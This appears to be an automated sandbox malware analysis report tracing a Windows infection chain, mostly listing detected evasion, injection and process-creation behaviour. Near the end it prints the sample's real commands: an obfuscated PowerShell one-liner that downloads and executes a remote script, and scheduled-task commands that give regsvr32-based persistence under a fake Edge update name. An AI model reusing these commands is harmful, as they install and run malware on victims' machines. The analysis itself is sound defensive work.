Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmprph.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmprph.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 26E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1A900000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 2770000 memory reserve | memory write watch
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1AB10000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5746 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4091 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7629 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1973 Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Window / User API: threadDelayed 457 Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Window / User API: threadDelayed 3481 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6046
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3635
Source: C:\Windows\System32\regsvr32.exe Window / User API: threadDelayed 4894
Source: C:\Windows\System32\regsvr32.exe Window / User API: threadDelayed 4948
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\rekeywiz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Gga6.ini Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\M08e.ini Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Windows\System32\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\Public\ajbs50ul.bat API coverage: 1.5 %
Source: C:\Windows\System32\rekeywiz.exe API coverage: 1.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3340 Thread sleep count: 5746 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep count: 4091 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep count: 7629 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep count: 1973 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 3020 Thread sleep time: -33600s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 3020 Thread sleep time: -696200s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2056 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340 Thread sleep count: 6046 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340 Thread sleep count: 3635 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2344 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1036 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 916 Thread sleep count: 4894 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 1548 Thread sleep count: 4948 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 7148 Thread sleep count: 48 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 7148 Thread sleep time: -44272185776902896s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2740F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError, 4_2_00007FF63D2740F0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04040F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError, 18_2_00007FF7F04040F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft Jump to behavior
Source: powershell.exe, 00000003.00000002.1674392136.000001BDDCE79000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: utox_x86_x64.exe, 00000008.00000002.2668189874.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: utox_x86_x64.exe, 00000008.00000002.2668189874.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000003.00000002.1676638424.000001BDDCFAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D221180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm, 4_2_00007FF63D221180
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D3FBC00 SetUnhandledExceptionFilter, 4_2_00007FF63D3FBC00
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F03B1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm, 18_2_00007FF7F03B1180
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04FDC00 SetUnhandledExceptionFilter, 18_2_00007FF7F04FDC00
Source: C:\Users\Public\ajbs50ul.bat Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 185.196.9.174 7777
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_5560.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5560, type: MEMORYSTR
.NET source code references suspicious native API functions
Source: 9.2.regsvr32.exe.2760000.1.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
Source: 9.2.regsvr32.exe.2760000.1.raw.unpack, Flutter.cs Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
Source: 9.2.regsvr32.exe.2760000.1.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
Allocates memory in foreign processes
Source: C:\Program Files\Windows Media Player\wmprph.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 24D91250000 protect: page read and write
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\Public\ajbs50ul.bat NtWriteFile: Indirect: 0x7FF63D277076 Jump to behavior
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\regsvr32.exe Thread register set: 2976 5 Jump to behavior
Writes to foreign memory regions
Source: C:\Program Files\Windows Media Player\wmprph.exe Memory written: C:\Windows\System32\dllhost.exe base: 24D91250000
Source: C:\Program Files\Windows Media Player\wmprph.exe Memory written: C:\Windows\System32\dllhost.exe base: 7FF6730814E0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
Source: C:\Program Files\Windows Media Player\wmprph.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""w 0""1 $jufn='i'+'e'+''+'x';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.replace(''v7i9'',''ttps://'').replace(''p24'', ''e''))').replace('wxwl', 't').replace('gdvi', 'nloads'))));exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""w 0""1 $jufn='i'+'e'+''+'x';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.replace(''v7i9'',''ttps://'').replace(''p24'', ''e''))').replace('wxwl', 't').replace('gdvi', 'nloads'))));exit
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/m08e.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{4c8ccccc-0448-48c8-c088-8cccc0000044}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/gga6.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{4c0c80c0-8884-4c8c-ccc0-cc80c840c404}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""w 0""1 $jufn='i'+'e'+''+'x';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.replace(''v7i9'',''ttps://'').replace(''p24'', ''e''))').replace('wxwl', 't').replace('gdvi', 'nloads'))));exit Jump to behavior
